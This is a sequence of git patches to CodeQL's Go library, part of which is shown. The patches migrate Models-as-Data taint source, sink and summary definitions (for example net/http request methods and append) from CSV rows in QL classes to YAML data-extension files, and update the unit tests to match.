Date: Mon, 19 Dec 2022 14:39:58 +0100 Subject: [PATCH 205/381] Go: Use the extensible predicates for model definitions. --- go/ql/lib/ext/builtin.model.yml | 7 ++ go/ql/lib/ext/dummy.model.yml | 14 ++++ go/ql/lib/semmle/go/dataflow/ExternalFlow.qll | 68 +------------------ 3 files changed, 24 insertions(+), 65 deletions(-) create mode 100644 go/ql/lib/ext/builtin.model.yml create mode 100644 go/ql/lib/ext/dummy.model.yml diff --git a/go/ql/lib/ext/builtin.model.yml b/go/ql/lib/ext/builtin.model.yml new file mode 100644 index 00000000000..f4e7a4e5348 --- /dev/null +++ b/go/ql/lib/ext/builtin.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/go-all + extensible: summaryModel + data: + - ["", "", False, "append", "", "", "Argument[0].ArrayElement", "ReturnValue.ArrayElement", "value", "manual"] + - ["", "", False, "append", "", "", "Argument[1]", "ReturnValue.ArrayElement", "value", "manual"] \ No newline at end of file diff --git a/go/ql/lib/ext/dummy.model.yml b/go/ql/lib/ext/dummy.model.yml new file mode 100644 index 00000000000..e04298be8ba --- /dev/null +++ b/go/ql/lib/ext/dummy.model.yml @@ -0,0 +1,14 @@ +extensions: + # Make sure that the extensible model predicates are at least defined as empty. + - addsTo: + pack: codeql/go-all + extensible: sourceModel + data: [] + - addsTo: + pack: codeql/go-all + extensible: sinkModel + data: [] + - addsTo: + pack: codeql/go-all + extensible: summaryModel + data: [] diff --git a/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll b/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll index 1392f849201..f4af6784f49 100644 --- a/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll +++ b/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll @@ -76,16 +76,6 @@ private module Frameworks { private import semmle.go.frameworks.Stdlib } -private class BuiltinModel extends SummaryModelCsv { - override predicate row(string row) { - row = - [ - ";;false;append;;;Argument[0].ArrayElement;ReturnValue.ArrayElement;value", - ";;false;append;;;Argument[1];ReturnValue.ArrayElement;value" - ] - } -} - /** * A unit class for adding additional source model rows. * @@ -126,65 +116,13 @@ predicate sinkModel(string row) { any(SinkModelCsv s).row(row) } predicate summaryModel(string row) { any(SummaryModelCsv s).row(row) } /** Holds if a source model exists for the given parameters. */ -predicate sourceModel( - string namespace, string type, boolean subtypes, string name, string signature, string ext, - string output, string kind, string provenance -) { - exists(string row | - sourceModel(row) and - row.splitAt(";", 0) = namespace and - row.splitAt(";", 1) = type and - row.splitAt(";", 2) = subtypes.toString() and - subtypes = [true, false] and - row.splitAt(";", 3) = name and - row.splitAt(";", 4) = signature and - row.splitAt(";", 5) = ext and - row.splitAt(";", 6) = output and - row.splitAt(";", 7) = kind and - provenance = "manual" - ) -} +predicate sourceModel = Extensions::sourceModel/9; /** Holds if a sink model exists for the given parameters. */ -predicate sinkModel( - string namespace, string type, boolean subtypes, string name, string signature, string ext, - string input, string kind, string provenance -) { - exists(string row | - sinkModel(row) and - row.splitAt(";", 0) = namespace and - row.splitAt(";", 1) = type and - row.splitAt(";", 2) = subtypes.toString() and - subtypes = [true, false] and - row.splitAt(";", 3) = name and - row.splitAt(";", 4) = signature and - row.splitAt(";", 5) = ext and - row.splitAt(";", 6) = input and - row.splitAt(";", 7) = kind and - provenance = "manual" - ) -} +predicate sinkModel = Extensions::sinkModel/9; /** Holds if a summary model exists for the given parameters. */ -predicate summaryModel( - string namespace, string type, boolean subtypes, string name, string signature, string ext, - string input, string output, string kind, string provenance -) { - exists(string row | - summaryModel(row) and - row.splitAt(";", 0) = namespace and - row.splitAt(";", 1) = type and - row.splitAt(";", 2) = subtypes.toString() and - subtypes = [true, false] and - row.splitAt(";", 3) = name and - row.splitAt(";", 4) = signature and - row.splitAt(";", 5) = ext and - row.splitAt(";", 6) = input and - row.splitAt(";", 7) = output and - row.splitAt(";", 8) = kind - ) and - provenance = "manual" -} +predicate summaryModel = Extensions::summaryModel/10; /** Holds if `package` have CSV framework coverage. */ private predicate packageHasCsvCoverage(string package) { From 218f553fef32af45d425a0708dfeb215673d8679 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 19 Dec 2022 14:42:38 +0100 Subject: [PATCH 206/381] Go: Convert remaining CSV production models to use data extensions. --- go/ql/lib/ext/archive_tar.model.yml | 6 ++++++ go/ql/lib/ext/net_http.model.yml | 13 +++++++++++++ .../semmle/go/frameworks/stdlib/ArchiveTar.qll | 7 ------- .../lib/semmle/go/frameworks/stdlib/NetHttp.qll | 17 ----------------- 4 files changed, 19 insertions(+), 24 deletions(-) create mode 100644 go/ql/lib/ext/archive_tar.model.yml create mode 100644 go/ql/lib/ext/net_http.model.yml diff --git a/go/ql/lib/ext/archive_tar.model.yml b/go/ql/lib/ext/archive_tar.model.yml new file mode 100644 index 00000000000..9b8fd572bf3 --- /dev/null +++ b/go/ql/lib/ext/archive_tar.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/go-all + extensible: summaryModel + data: + - ["archive/tar", "", True, "FileInfoHeader", "", "", "Argument[0]", "ReturnValue[0]", "taint", "manual"] \ No newline at end of file diff --git a/go/ql/lib/ext/net_http.model.yml b/go/ql/lib/ext/net_http.model.yml new file mode 100644 index 00000000000..0b686cfb432 --- /dev/null +++ b/go/ql/lib/ext/net_http.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/go-all + extensible: sourceModel + data: + - ["net/http", "Request", True, "Cookie", "", "", "ReturnValue[0]", "remote", "manual"] + - ["net/http", "Request", True, "Cookies", "", "", "ReturnValue.ArrayElement", "remote", "manual"] + - ["net/http", "Request", True, "FormFile", "", "", "ReturnValue[0..1]", "remote", "manual"] + - ["net/http", "Request", True, "FormValue", "", "", "ReturnValue", "remote", "manual"] + - ["net/http", "Request", True, "MultipartReader", "", "", "ReturnValue[0]", "remote", "manual"] + - ["net/http", "Request", True, "PostFormValue", "", "", "ReturnValue", "remote", "manual"] + - ["net/http", "Request", True, "Referer", "", "", "ReturnValue", "remote", "manual"] + - ["net/http", "Request", True, "UserAgent", "", "", "ReturnValue", "remote", "manual"] diff --git a/go/ql/lib/semmle/go/frameworks/stdlib/ArchiveTar.qll b/go/ql/lib/semmle/go/frameworks/stdlib/ArchiveTar.qll index ef2d3b6446f..81bae84c052 100644 --- a/go/ql/lib/semmle/go/frameworks/stdlib/ArchiveTar.qll +++ b/go/ql/lib/semmle/go/frameworks/stdlib/ArchiveTar.qll @@ -3,13 +3,6 @@ */ import go -private import semmle.go.dataflow.ExternalFlow - -private class FlowSummaries extends SummaryModelCsv { - override predicate row(string row) { - row = ["archive/tar;;true;FileInfoHeader;;;Argument[0];ReturnValue[0];taint"] - } -} /** Provides models of commonly used functions in the `archive/tar` package. */ module ArchiveTar { diff --git a/go/ql/lib/semmle/go/frameworks/stdlib/NetHttp.qll b/go/ql/lib/semmle/go/frameworks/stdlib/NetHttp.qll index e0518ecf465..12eee7079f7 100644 --- a/go/ql/lib/semmle/go/frameworks/stdlib/NetHttp.qll +++ b/go/ql/lib/semmle/go/frameworks/stdlib/NetHttp.qll @@ -3,23 +3,6 @@ */ import go -private import semmle.go.dataflow.ExternalFlow - -private class FlowSources extends SourceModelCsv { - override predicate row(string row) { - row = - [ - "net/http;Request;true;Cookie;;;ReturnValue[0];remote", - "net/http;Request;true;Cookies;;;ReturnValue.ArrayElement;remote", - "net/http;Request;true;FormFile;;;ReturnValue[0..1];remote", - "net/http;Request;true;FormValue;;;ReturnValue;remote", - "net/http;Request;true;MultipartReader;;;ReturnValue[0];remote", - "net/http;Request;true;PostFormValue;;;ReturnValue;remote", - "net/http;Request;true;Referer;;;ReturnValue;remote", - "net/http;Request;true;UserAgent;;;ReturnValue;remote" - ] - } -} /** Provides models of commonly used functions in the `net/http` package. */ module NetHttp { From 3749a1bd4df15d3e715f4d839d0feddf009a88ac Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 19 Dec 2022 15:11:27 +0100 Subject: [PATCH 207/381] Go: Migrate unit tests to use data extensions for Models as Data. --- .../ExternalFlow/completetest.ext.yml | 38 ++++++++++++++ .../go/dataflow/ExternalFlow/completetest.ql | 50 ------------------- .../go/dataflow/ExternalFlow/sinks.ext.yml | 8 +++ .../semmle/go/dataflow/ExternalFlow/sinks.ql | 12 ----- .../go/dataflow/ExternalFlow/srcs.ext.yml | 11 ++++ .../semmle/go/dataflow/ExternalFlow/srcs.ql | 15 ------ .../go/dataflow/ExternalFlow/steps.ext.yml | 14 ++++++ .../semmle/go/dataflow/ExternalFlow/steps.ql | 18 ------- .../ExternalFlowVarArgs/Flows.ext.yml | 10 ++++ .../go/dataflow/ExternalFlowVarArgs/Flows.ql | 14 ------ 10 files changed, 81 insertions(+), 109 deletions(-) create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ext.yml create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ext.yml create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ext.yml create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ext.yml create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ext.yml diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ext.yml b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ext.yml new file mode 100644 index 00000000000..79ca023562c --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ext.yml @@ -0,0 +1,38 @@ +extensions: + - addsTo: + pack: codeql/go-all + extensible: summaryModel + data: + - ["github.com/nonexistent/test", "T", False, "StepArgRes", "", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["github.com/nonexistent/test", "T", False, "StepArgRes1", "", "", "Argument[0]", "ReturnValue[1]", "taint", "manual"] + - ["github.com/nonexistent/test", "T", False, "StepArgArg", "", "", "Argument[0]", "Argument[1]", "taint", "manual"] + - ["github.com/nonexistent/test", "T", False, "StepArgQual", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["github.com/nonexistent/test", "T", False, "StepQualRes", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["github.com/nonexistent/test", "T", False, "StepQualArg", "", "", "Argument[-1]", "Argument[0]", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgResNoQual", "", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgResArrayContent", "", "", "Argument[0]", "ReturnValue.ArrayElement", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgArrayContentRes", "", "", "Argument[0].ArrayElement", "ReturnValue", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgResCollectionContent", "", "", "Argument[0]", "ReturnValue.Element", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgCollectionContentRes", "", "", "Argument[0].Element", "ReturnValue", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgResMapKeyContent", "", "", "Argument[0]", "ReturnValue.MapKey", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgMapKeyContentRes", "", "", "Argument[0].MapKey", "ReturnValue", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgResMapValueContent", "", "", "Argument[0]", "ReturnValue.MapValue", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgMapValueContentRes", "", "", "Argument[0].MapValue", "ReturnValue", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "GetElement", "", "", "Argument[0].Element", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "GetMapKey", "", "", "Argument[0].MapKey", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "SetElement", "", "", "Argument[0]", "ReturnValue.Element", "value", "manual"] + - ["github.com/nonexistent/test", "C", False, "Get", "", "", "Argument[-1].Field[github.com/nonexistent/test.C.F]", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "C", False, "Set", "", "", "Argument[0]", "Argument[-1].Field[github.com/nonexistent/test.C.F]", "value", "manual"] + + - addsTo: + pack: codeql/go-all + extensible: sourceModel + data: + - ["github.com/nonexistent/test", "A", False, "Src1", "", "", "ReturnValue", "qltest", "manual"] + + - addsTo: + pack: codeql/go-all + extensible: sinkModel + data: + - ["github.com/nonexistent/test", "B", False, "Sink1", "", "", "Argument[0]", "qltest", "manual"] + - ["github.com/nonexistent/test", "B", False, "SinkManyArgs", "", "", "Argument[0..2]", "qltest", "manual"] diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ql index 6554f5c5ec0..45e67564e06 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ql @@ -8,56 +8,6 @@ import CsvValidation import semmle.go.dataflow.internal.FlowSummaryImpl as FlowSummaryImpl import TestUtilities.InlineFlowTest -class SummaryModelTest extends SummaryModelCsv { - override predicate row(string row) { - row = - [ - //`namespace; type; subtypes; name; signature; ext; input; output; kind` - "github.com/nonexistent/test;T;false;StepArgRes;;;Argument[0];ReturnValue;taint", - "github.com/nonexistent/test;T;false;StepArgRes1;;;Argument[0];ReturnValue[1];taint", - "github.com/nonexistent/test;T;false;StepArgArg;;;Argument[0];Argument[1];taint", - "github.com/nonexistent/test;T;false;StepArgQual;;;Argument[0];Argument[-1];taint", - "github.com/nonexistent/test;T;false;StepQualRes;;;Argument[-1];ReturnValue;taint", - "github.com/nonexistent/test;T;false;StepQualArg;;;Argument[-1];Argument[0];taint", - "github.com/nonexistent/test;;false;StepArgResNoQual;;;Argument[0];ReturnValue;taint", - "github.com/nonexistent/test;;false;StepArgResArrayContent;;;Argument[0];ReturnValue.ArrayElement;taint", - "github.com/nonexistent/test;;false;StepArgArrayContentRes;;;Argument[0].ArrayElement;ReturnValue;taint", - "github.com/nonexistent/test;;false;StepArgResCollectionContent;;;Argument[0];ReturnValue.Element;taint", - "github.com/nonexistent/test;;false;StepArgCollectionContentRes;;;Argument[0].Element;ReturnValue;taint", - "github.com/nonexistent/test;;false;StepArgResMapKeyContent;;;Argument[0];ReturnValue.MapKey;taint", - "github.com/nonexistent/test;;false;StepArgMapKeyContentRes;;;Argument[0].MapKey;ReturnValue;taint", - "github.com/nonexistent/test;;false;StepArgResMapValueContent;;;Argument[0];ReturnValue.MapValue;taint", - "github.com/nonexistent/test;;false;StepArgMapValueContentRes;;;Argument[0].MapValue;ReturnValue;taint", - "github.com/nonexistent/test;;false;GetElement;;;Argument[0].Element;ReturnValue;value", - "github.com/nonexistent/test;;false;GetMapKey;;;Argument[0].MapKey;ReturnValue;value", - "github.com/nonexistent/test;;false;SetElement;;;Argument[0];ReturnValue.Element;value", - "github.com/nonexistent/test;C;false;Get;;;Argument[-1].Field[github.com/nonexistent/test.C.F];ReturnValue;value", - "github.com/nonexistent/test;C;false;Set;;;Argument[0];Argument[-1].Field[github.com/nonexistent/test.C.F];value", - ] - } -} - -class SourceModelTest extends SourceModelCsv { - override predicate row(string row) { - row = - [ - //`namespace; type; subtypes; name; -; ext; output; kind` - "github.com/nonexistent/test;A;false;Src1;;;ReturnValue;qltest" - ] - } -} - -class SinkModelTest extends SinkModelCsv { - override predicate row(string row) { - row = - [ - //`namespace; type; subtypes; name; -; ext; input; kind` - "github.com/nonexistent/test;B;false;Sink1;;;Argument[0];qltest", - "github.com/nonexistent/test;B;false;SinkManyArgs;;;Argument[0..2];qltest" - ] - } -} - class Config extends TaintTracking::Configuration { Config() { this = "external-flow-test" } diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ext.yml b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ext.yml new file mode 100644 index 00000000000..653f82bae61 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ext.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/go-all + extensible: sinkModel + data: + - ["github.com/nonexistent/test", "B", False, "Sink1", "", "", "Argument[0]", "qltest", "manual"] + - ["github.com/nonexistent/test", "B", False, "SinkMethod", "", "", "Argument[-1]", "qltest", "manual"] + - ["github.com/nonexistent/test", "B", False, "SinkManyArgs", "", "", "Argument[0..2]", "qltest", "manual"] \ No newline at end of file diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ql index a95446246c9..48d75ce06e6 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ql @@ -2,18 +2,6 @@ import go import semmle.go.dataflow.ExternalFlow import CsvValidation -class SinkModelTest extends SinkModelCsv { - override predicate row(string row) { - row = - [ - //`namespace; type; subtypes; name; -; ext; input; kind` - "github.com/nonexistent/test;B;false;Sink1;;;Argument[0];qltest", - "github.com/nonexistent/test;B;false;SinkMethod;;;Argument[-1];qltest", - "github.com/nonexistent/test;B;false;SinkManyArgs;;;Argument[0..2];qltest", - ] - } -} - from DataFlow::Node node, string kind where sinkNode(node, kind) select node, kind diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ext.yml b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ext.yml new file mode 100644 index 00000000000..5493650132c --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ext.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/go-all + extensible: sourceModel + data: + - ["github.com/nonexistent/test", "A", False, "Src1", "", "", "ReturnValue", "qltest", "manual"] + - ["github.com/nonexistent/test", "A", False, "Src2", "", "", "ReturnValue", "qltest", "manual"] + - ["github.com/nonexistent/test", "A", True, "Src2", "", "", "ReturnValue", "qltest-w-subtypes", "manual"] + - ["github.com/nonexistent/test", "A", False, "SrcArg", "", "", "Argument[0]", "qltest-arg", "manual"] + - ["github.com/nonexistent/test", "A", False, "Src3", "", "", "ReturnValue[0]", "qltest", "manual"] + - ["github.com/nonexistent/test", "A", True, "Src3", "", "", "ReturnValue[1]", "qltest-w-subtypes", "manual"] \ No newline at end of file diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ql index 79514cbdc23..cffb909c495 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ql @@ -2,21 +2,6 @@ import go import semmle.go.dataflow.ExternalFlow import CsvValidation -class SourceModelTest extends SourceModelCsv { - override predicate row(string row) { - row = - [ - //`namespace; type; subtypes; name; -; ext; output; kind` - "github.com/nonexistent/test;A;false;Src1;;;ReturnValue;qltest", - "github.com/nonexistent/test;A;false;Src2;;;ReturnValue;qltest", - "github.com/nonexistent/test;A;true;Src2;;;ReturnValue;qltest-w-subtypes", - "github.com/nonexistent/test;A;false;SrcArg;;;Argument[0];qltest-arg", - "github.com/nonexistent/test;A;false;Src3;;;ReturnValue[0];qltest", - "github.com/nonexistent/test;A;true;Src3;;;ReturnValue[1];qltest-w-subtypes" - ] - } -} - from DataFlow::Node node, string kind where sourceNode(node, kind) select node, kind diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ext.yml b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ext.yml new file mode 100644 index 00000000000..f1c5a78ecbf --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ext.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/go-all + extensible: summaryModel + data: + - ["github.com/nonexistent/test", "T", False, "StepArgRes", "", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["github.com/nonexistent/test", "T", False, "StepArgRes1", "", "", "Argument[0]", "ReturnValue[1]", "taint", "manual"] + - ["github.com/nonexistent/test", "T", False, "StepArgArg", "", "", "Argument[0]", "Argument[1]", "taint", "manual"] + - ["github.com/nonexistent/test", "T", False, "StepArgQual", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["github.com/nonexistent/test", "T", False, "StepQualRes", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["github.com/nonexistent/test", "T", False, "StepQualArg", "", "", "Argument[-1]", "Argument[0]", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgResNoQual", "", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgResContent", "", "", "Argument[0]", "ReturnValue.ArrayElement", "taint", "manual"] + - ["github.com/nonexistent/test", "", False, "StepArgContentRes", "", "", "Argument[0].ArrayElement", "ReturnValue", "taint", "manual"] diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ql index c6603c5df93..8ae82d104d6 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ql @@ -3,24 +3,6 @@ import semmle.go.dataflow.ExternalFlow import CsvValidation import semmle.go.dataflow.internal.FlowSummaryImpl as FlowSummaryImpl -class SummaryModelTest extends SummaryModelCsv { - override predicate row(string row) { - row = - [ - //`namespace; type; subtypes; name; -; ext; input; output; kind` - "github.com/nonexistent/test;T;false;StepArgRes;;;Argument[0];ReturnValue;taint", - "github.com/nonexistent/test;T;false;StepArgRes1;;;Argument[0];ReturnValue[1];taint", - "github.com/nonexistent/test;T;false;StepArgArg;;;Argument[0];Argument[1];taint", - "github.com/nonexistent/test;T;false;StepArgQual;;;Argument[0];Argument[-1];taint", - "github.com/nonexistent/test;T;false;StepQualRes;;;Argument[-1];ReturnValue;taint", - "github.com/nonexistent/test;T;false;StepQualArg;;;Argument[-1];Argument[0];taint", - "github.com/nonexistent/test;;false;StepArgResNoQual;;;Argument[0];ReturnValue;taint", - "github.com/nonexistent/test;;false;StepArgResContent;;;Argument[0];ReturnValue.ArrayElement;taint", - "github.com/nonexistent/test;;false;StepArgContentRes;;;Argument[0].ArrayElement;ReturnValue;taint" - ] - } -} - from DataFlow::Node node1, DataFlow::Node node2 where FlowSummaryImpl::Private::Steps::summaryThroughStepTaint(node1, node2, _) select node1, node2 diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ext.yml b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ext.yml new file mode 100644 index 00000000000..c4c77087049 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ext.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/go-all + extensible: summaryModel + data: + - ["github.com/nonexistent/test", "", False, "FunctionWithParameter", "", "", "Argument[0]", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithSliceParameter", "", "", "Argument[0].ArrayElement", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithVarArgsParameter", "", "", "Argument[0].ArrayElement", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithSliceOfStructsParameter", "", "", "Argument[0].ArrayElement.Field[github.com/nonexistent/test.A.Field]", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithVarArgsOfStructsParameter", "", "", "Argument[0].ArrayElement.Field[github.com/nonexistent/test.A.Field]", "ReturnValue", "value", "manual"] diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ql index 278da456bf2..f7c77d944f2 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ql @@ -3,20 +3,6 @@ import semmle.go.dataflow.ExternalFlow import CsvValidation import TestUtilities.InlineExpectationsTest -class SummaryModelTest extends SummaryModelCsv { - override predicate row(string row) { - row = - [ - //`namespace; type; subtypes; name; signature; ext; input; output; kind` - "github.com/nonexistent/test;;false;FunctionWithParameter;;;Argument[0];ReturnValue;value", - "github.com/nonexistent/test;;false;FunctionWithSliceParameter;;;Argument[0].ArrayElement;ReturnValue;value", - "github.com/nonexistent/test;;false;FunctionWithVarArgsParameter;;;Argument[0].ArrayElement;ReturnValue;value", - "github.com/nonexistent/test;;false;FunctionWithSliceOfStructsParameter;;;Argument[0].ArrayElement.Field[github.com/nonexistent/test.A.Field];ReturnValue;value", - "github.com/nonexistent/test;;false;FunctionWithVarArgsOfStructsParameter;;;Argument[0].ArrayElement.Field[github.com/nonexistent/test.A.Field];ReturnValue;value" - ] - } -} - class DataConfiguration extends DataFlow::Configuration { DataConfiguration() { this = "data-configuration" } From 48d0eccbf6e249095cdfd5cf974e168360931e50 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 19 Dec 2022 15:43:49 +0100 Subject: [PATCH 208/381] Go: Cleanup and renaming. --- go/ql/lib/semmle/go/dataflow/ExternalFlow.qll | 153 +++++------------- .../internal/FlowSummaryImplSpecific.qll | 24 ++- go/ql/lib/semmle/go/security/FlowSources.qll | 9 +- .../go/dataflow/ExternalFlow/completetest.ql | 2 +- .../semmle/go/dataflow/ExternalFlow/sinks.ql | 2 +- .../semmle/go/dataflow/ExternalFlow/srcs.ql | 2 +- .../semmle/go/dataflow/ExternalFlow/steps.ql | 2 +- .../go/dataflow/ExternalFlowVarArgs/Flows.ql | 2 +- .../VarArgsWithFunctionModels/Flows.ql | 2 +- 9 files changed, 65 insertions(+), 133 deletions(-) diff --git a/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll b/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll index f4af6784f49..7fde586838a 100644 --- a/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll +++ b/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll @@ -1,19 +1,20 @@ /** * INTERNAL use only. This is an experimental API subject to change without notice. * - * Provides classes and predicates for dealing with flow models specified in CSV format. + * Provides classes and predicates for dealing with MaD flow models specified + * in data extensions and CSV format. * * The CSV specification has the following columns: * - Sources: - * `namespace; type; subtypes; name; signature; ext; output; kind` + * `package; type; subtypes; name; signature; ext; output; kind; provenance` * - Sinks: - * `namespace; type; subtypes; name; signature; ext; input; kind` + * `package; type; subtypes; name; signature; ext; input; kind; provenance` * - Summaries: - * `namespace; type; subtypes; name; signature; ext; input; output; kind` + * `package; type; subtypes; name; signature; ext; input; output; kind; provenance` * * The interpretation of a row is similar to API-graphs with a left-to-right * reading. - * 1. The `namespace` column selects a package. + * 1. The `package` column selects a package. * 2. The `type` column selects a type within that package. * 3. The `subtypes` is a boolean that indicates whether to jump to an * arbitrary subtype of that type. @@ -76,45 +77,6 @@ private module Frameworks { private import semmle.go.frameworks.Stdlib } -/** - * A unit class for adding additional source model rows. - * - * Extend this class to add additional source definitions. - */ -class SourceModelCsv extends Unit { - /** Holds if `row` specifies a source definition. */ - abstract predicate row(string row); -} - -/** - * A unit class for adding additional sink model rows. - * - * Extend this class to add additional sink definitions. - */ -class SinkModelCsv extends Unit { - /** Holds if `row` specifies a sink definition. */ - abstract predicate row(string row); -} - -/** - * A unit class for adding additional summary model rows. - * - * Extend this class to add additional flow summary definitions. - */ -class SummaryModelCsv extends Unit { - /** Holds if `row` specifies a summary definition. */ - abstract predicate row(string row); -} - -/** Holds if `row` is a source model. */ -predicate sourceModel(string row) { any(SourceModelCsv s).row(row) } - -/** Holds if `row` is a sink model. */ -predicate sinkModel(string row) { any(SinkModelCsv s).row(row) } - -/** Holds if `row` is a summary model. */ -predicate summaryModel(string row) { any(SummaryModelCsv s).row(row) } - /** Holds if a source model exists for the given parameters. */ predicate sourceModel = Extensions::sourceModel/9; @@ -124,35 +86,35 @@ predicate sinkModel = Extensions::sinkModel/9; /** Holds if a summary model exists for the given parameters. */ predicate summaryModel = Extensions::summaryModel/10; -/** Holds if `package` have CSV framework coverage. */ -private predicate packageHasCsvCoverage(string package) { +/** Holds if `package` have MaD framework coverage. */ +private predicate packageHasMaDCoverage(string package) { sourceModel(package, _, _, _, _, _, _, _, _) or sinkModel(package, _, _, _, _, _, _, _, _) or summaryModel(package, _, _, _, _, _, _, _, _, _) } /** - * Holds if `package` and `subpkg` have CSV framework coverage and `subpkg` + * Holds if `package` and `subpkg` have MaD framework coverage and `subpkg` * is a subpackage of `package`. */ private predicate packageHasASubpackage(string package, string subpkg) { - packageHasCsvCoverage(package) and - packageHasCsvCoverage(subpkg) and + packageHasMaDCoverage(package) and + packageHasMaDCoverage(subpkg) and subpkg.prefix(subpkg.indexOf(".")) = package } /** - * Holds if `package` has CSV framework coverage and it is not a subpackage of - * any other package with CSV framework coverage. + * Holds if `package` has MaD framework coverage and it is not a subpackage of + * any other package with MaD framework coverage. */ private predicate canonicalPackage(string package) { - packageHasCsvCoverage(package) and not packageHasASubpackage(_, package) + packageHasMaDCoverage(package) and not packageHasASubpackage(_, package) } /** - * Holds if `package` and `subpkg` have CSV framework coverage, `subpkg` is a + * Holds if `package` and `subpkg` have MaD framework coverage, `subpkg` is a * subpackage of `package` (or they are the same), and `package` is not a 